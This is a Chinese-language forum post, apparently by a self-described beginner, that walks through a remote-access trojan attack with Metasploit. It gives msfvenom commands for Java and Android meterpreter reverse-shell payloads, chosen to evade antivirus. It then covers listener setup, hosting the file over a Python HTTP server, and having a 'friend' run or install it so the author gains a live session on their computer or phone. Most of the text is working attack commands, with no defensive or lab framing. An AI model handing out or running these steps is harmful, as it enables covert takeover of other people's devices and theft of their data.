|
|
大家,我是hk小白,我只是一个小白可称为白中白,好了教程开始。
这个就有点类似于拿到命令执行漏洞,在对方机器上反弹shell一样。
此处为给朋友做演示,直接给他发一个马让他执行,来看看我们可以做什么。
首先需要一台公网服务器。(别问为什么)
1.生成木马
为防止exe文件被杀软杀掉,我们生成一个jar的马。(前提是对方机器有java环境)
1.1电脑
LHOST中填写你的公网IP,LPORT填写端口(随意哪个,不要80)
指令
msfvenom -p java/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2121 W>a.jar
1.2安卓手机
同理,命令换成
msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2121 R > a.apk
2.开启监听
好了,此时我们先去开启监听。
首先打开你的msf。kali下输入命令msfconsole。
2.1 电脑
然后开启监听:(-H后为你的公网IPhandler -p java/meterpreter/reverse_tcp -H xx.xx.xx.xx -P 2121)
2.2手机
监听命令换为
handler -p android/meterpreter/reverse_tcp -H xx.xx.xx.xx -P 2121
3.发送并执行木马
将上一步生成好的木马之后发给你的朋友,或者直接让他下下来,利用python快速开启一个http服务。(8080为指定端口,你指定其他也可以
python -m SimpleHTTPServer 8080
3.1电脑
然后把地址发给对方。并让对方执行。
在他执行的一瞬间,你就看到这边已经弹回来了。
查看sessions
sessions
进入会话(序号是几就按几)
sessions 1
3.2 手机
让对方安装apk就好了。
 |
|
发表于 2022-5-8 19:38:43
